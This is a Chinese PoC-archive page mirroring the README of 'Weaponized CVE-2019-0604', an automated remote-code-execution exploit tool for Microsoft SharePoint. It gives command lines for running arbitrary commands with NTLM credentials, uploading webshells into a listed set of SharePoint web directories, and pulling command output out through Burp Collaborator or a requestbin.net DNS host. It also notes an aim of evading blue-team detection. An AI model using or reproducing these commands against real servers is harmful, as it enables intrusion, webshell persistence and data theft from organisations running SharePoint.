关联漏洞
标题:Microsoft SharePoint 输入验证错误漏洞 (CVE-2019-0604)Description:Microsoft SharePoint是美国微软(Microsoft)公司的一套企业业务协作平台。该平台用于对业务信息进行整合,并能够共享工作、与他人协同工作、组织项目和工作组、搜索人员和信息。 Microsoft SharePoint中存在远程代码执行漏洞,该漏洞源于程序无法检查应用程序包的源标记。攻击者可借助特制的SharePoint应用程序包利用该漏洞执行任意代码。以下版本受到影响:Microsoft SharePoint Enterprise Server 2016,SharePoint Fou
Description
Automated tool to exploit sharepoint CVE-2019-0604
介绍
# Weaponized CVE-2019-0604
Automated Exploit Tool to Maximize CVE-2019-0604.
## Requirement
The `requirements.txt` file should list all Python libraries this tool used, and they'll be installed using
```
$ pip install -r requirements.txt
```
## Manual blind exploit (with(out) credential)
```
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>
```
## Upload function
upload anything cool (webshell, recon tool ...)
```
Upload cmd.aspx to rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx
```
### Directory Mapping
```
Sharepoint Default Web Virtual Dir:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/
```
## Use OOB to get command result
### With [collaborator\_http\_api](https://github.com/tree-chtsec/burp-python-plugins) Burp Extension
1. Install `collaborator_http_api.py` into BurpSuite (Pro)?
2. Make sure BurpSuite running on the same machine with this exploit.
3. Fire, enjoy the retrieved output :)
```
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>
```
### With DNSLog s.t. requestbin.net
```sh
$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"
```
Get Data From dns
```
2050524956494c4547455320494e464f524d4154494f4e
...
```
Decoded by yourself :)
```
PRIVILEGES INFORMATION
...
```
## TODO
- [x] Argument Parser
- [x] SharePoint, CVE-2019-0604
- [ ] split cmd into multiple parts (in args.cmds)
- [x] specify binary on demand, avoiding detection by blue team. (hardcode cmd.exe currently)
## Author
* Tree
文件快照
[4.0K] /data/pocs/e7b277cd6b4283bbb7bd930f0f9be00a8fd8dcac
├── [3.0K] burpReq.py
├── [9.5K] exploit.py
├── [1.0K] LICENSE
├── [4.0K] oob
│ ├── [1.3K] collab_handler.py
│ ├── [2.1K] decoder.py
│ ├── [ 0] __init__.py
│ ├── [1.0K] payload.ps1
│ └── [ 944] sample.json
├── [2.4K] README.md
├── [ 34] requirements.txt
├── [3.4K] sharepointkit.py
└── [577K] SHAREPOINT_RCE_OOB.png
1 directory, 12 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。